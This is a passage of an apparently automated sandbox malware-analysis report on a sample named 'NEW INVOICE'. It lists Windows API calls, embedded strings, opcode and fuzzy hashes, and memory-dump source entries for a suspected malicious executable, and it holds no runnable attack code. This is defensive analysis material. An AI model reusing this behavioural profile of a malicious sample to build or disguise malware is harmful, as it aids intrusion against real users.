                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$_wcslen
                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                    • API String ID: 2420728520-1007645807
                                                                                    • Opcode ID: 2e8e49e05c1f121906b47c7a82fbb4c843ecfb9788746b18ac8014d8855edcbb
                                                                                    • Instruction ID: e5e6e3524f15ee9b53aa238c1547bf14c0af5fa70a1fb0ad50a0449216793e57
                                                                                    • Opcode Fuzzy Hash: 2e8e49e05c1f121906b47c7a82fbb4c843ecfb9788746b18ac8014d8855edcbb
                                                                                    • Instruction Fuzzy Hash: F321A53164830476E220FB51DC87F9E7798AB84B14F200D3BBA407A0D1DBA8E94CC76E
                                                                                    APIs
                                                                                    • GetParent.USER32 ref: 00445A8D
                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                    • __wcsicoll.LIBCMT ref: 00445AC4
                                                                                    • __wcsicoll.LIBCMT ref: 00445AE0
                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                    • API String ID: 3125838495-3381328864
                                                                                    • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                    • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                    • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                    • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CopyVariant$ErrorLast
                                                                                    • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                    • API String ID: 2286883814-4206948668
                                                                                    • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                    • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                    • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                    • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                    APIs
                                                                                      • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                      • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                    • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                    • _wcscpy.LIBCMT ref: 00475F18
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                    • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                    • API String ID: 3052893215-4176887700
                                                                                    • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                    • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                                    • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                    • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                                    APIs
                                                                                    • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                    • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                    • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                    • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                    • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                    • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                      • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                    • String ID: Version$\TypeLib$interface\
                                                                                    • API String ID: 656856066-939221531
                                                                                    • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                    • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                    • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                    • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                    APIs
                                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                    • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                    • __swprintf.LIBCMT ref: 0045E6EE
                                                                                    • _printf.LIBCMT ref: 0045E7A9
                                                                                    • _printf.LIBCMT ref: 0045E7D2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString_printf$__swprintf_wcslen
                                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 3590180749-2354261254
                                                                                    • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                    • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                    • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                    • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                    • API String ID: 3038501623-2263619337
                                                                                    • Opcode ID: 8ea6ddc996ebef1c7950de8ae128e0744c87d41cbaff66ecd09c9901680fa350
                                                                                    • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                                    • Opcode Fuzzy Hash: 8ea6ddc996ebef1c7950de8ae128e0744c87d41cbaff66ecd09c9901680fa350
                                                                                    • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                                    APIs
                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                    • _memset.LIBCMT ref: 00458194
                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                    • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                    • API String ID: 2255324689-22481851
                                                                                    • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                    • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                    • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                    • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                    • __wcsicoll.LIBCMT ref: 004585D6
                                                                                    • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                    • String ID: ($interface$interface\
                                                                                    • API String ID: 2231185022-3327702407
                                                                                    • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                    • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                    • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                    • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                    APIs
                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                                    • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                                    • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                                    • _wcscpy.LIBCMT ref: 004365F5
                                                                                    • WSACleanup.WSOCK32 ref: 004365FD
                                                                                    • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                                    • _strcat.LIBCMT ref: 0043662F
                                                                                    • _wcscpy.LIBCMT ref: 00436644
                                                                                    • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                                    • _wcscpy.LIBCMT ref: 00436666
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                                    • String ID: 0.0.0.0
                                                                                    • API String ID: 2691793716-3771769585
                                                                                    • Opcode ID: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                                    • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                    • Opcode Fuzzy Hash: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                                    • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                    • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                      • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                      • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                    • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                    • __lock.LIBCMT ref: 00416B8A
                                                                                    • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                    • __lock.LIBCMT ref: 00416BAB
                                                                                    • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                    • API String ID: 1028249917-2843748187
                                                                                    • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                    • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                                    • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                    • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                    • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                    • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                    • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                    • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CharNext
                                                                                    • String ID:
                                                                                    • API String ID: 1350042424-0
                                                                                    • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                    • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                    • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                    • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                    • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                    • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                    • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                    • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                    • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                    • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                    • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                    • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                    • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                                    • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                                    • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                    • String ID:
                                                                                    • API String ID: 3096461208-0
                                                                                    • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                    • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                                    • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                    • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                                    APIs
                                                                                    Memory Dump Source
